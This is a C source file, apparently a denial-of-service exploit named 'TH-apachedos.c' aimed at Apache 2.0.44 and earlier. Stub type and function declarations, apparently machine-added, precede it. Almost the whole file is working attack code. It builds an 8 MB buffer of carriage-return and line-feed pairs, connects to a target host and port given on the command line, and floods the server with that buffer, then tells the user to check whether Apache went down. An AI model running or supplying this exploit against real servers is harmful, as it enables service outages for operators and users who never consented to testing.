
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int target ;
struct in_addr {int dummy; } ;
struct sockaddr_in {struct in_addr sin_addr; int sin_port; int sin_family; } ;
struct sockaddr {int dummy; } ;
struct hostent {scalar_t__ h_addr; } ;


 int AF_INET ;
 int IPPROTO_TCP ;
 int SOCK_STREAM ;
 int atoi (char*) ;
 int close (int) ;
 scalar_t__ connect (int,struct sockaddr*,int) ;
 int exit (int) ;
 int fprintf (int ,char*,...) ;
 struct hostent* gethostbyname (char*) ;
 int herror (char*) ;
 int htons (int) ;
 char* inet_ntoa (struct in_addr) ;
 int memset (struct sockaddr_in*,int ,int) ;
 int perror (char*) ;
 int printf (char*,...) ;
 scalar_t__ send (int,char*,scalar_t__,int ) ;
 int socket (int ,int ,int ) ;
 int stderr ;
 scalar_t__ strlen (char*) ;

int main(int argc, char *argv[])
{
int sockfd;
int count;
char buffer[8000000];
struct sockaddr_in target;
struct hostent *he;

if (argc != 3)
{
fprintf(stderr, "\nTH-apachedos.c - Apache <= 2.0.44 DoS exploit.");
fprintf(stderr, "\n----------------------------------------------");
fprintf(stderr, "\nUsage: %s <Target> <Port>\n\n", argv[0]);
exit(-1);
}

printf("\nTH-Apache DoS\n");
printf("-------------\n");
printf("-> Starting...\n");
printf("->\n");



for (count = 0; count < 8000000;)
{
buffer[count] = '\r';
count++;
buffer[count] = '\n';
count++;
}

if ((he=gethostbyname(argv[1])) == ((void*)0))
{
herror("gethostbyname() failed ");
exit(-1);
}

memset(&target, 0, sizeof(target));
target.sin_family = AF_INET;
target.sin_port = htons(atoi(argv[2]));
target.sin_addr = *((struct in_addr *)he->h_addr);

printf("-> Connecting to %s:%d...\n", inet_ntoa(target.sin_addr), atoi(argv[2]));
printf("->\n");

if ((sockfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
perror("socket() failed ");
exit(-1);
}

if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) < 0)
{
perror("connect() failed ");
exit(-1);
}

printf("-> Connected to %s:%d... Sending linefeeds...\n", inet_ntoa(target.sin_addr),
atoi(argv[2]));
printf("->\n");

if (send(sockfd, buffer, strlen(buffer), 0) != strlen(buffer))
{
perror("send() failed ");
exit(-1);
close(sockfd);
}


close(sockfd);

printf("-> Finished smoothly, check hosts apache...\n\n");
}
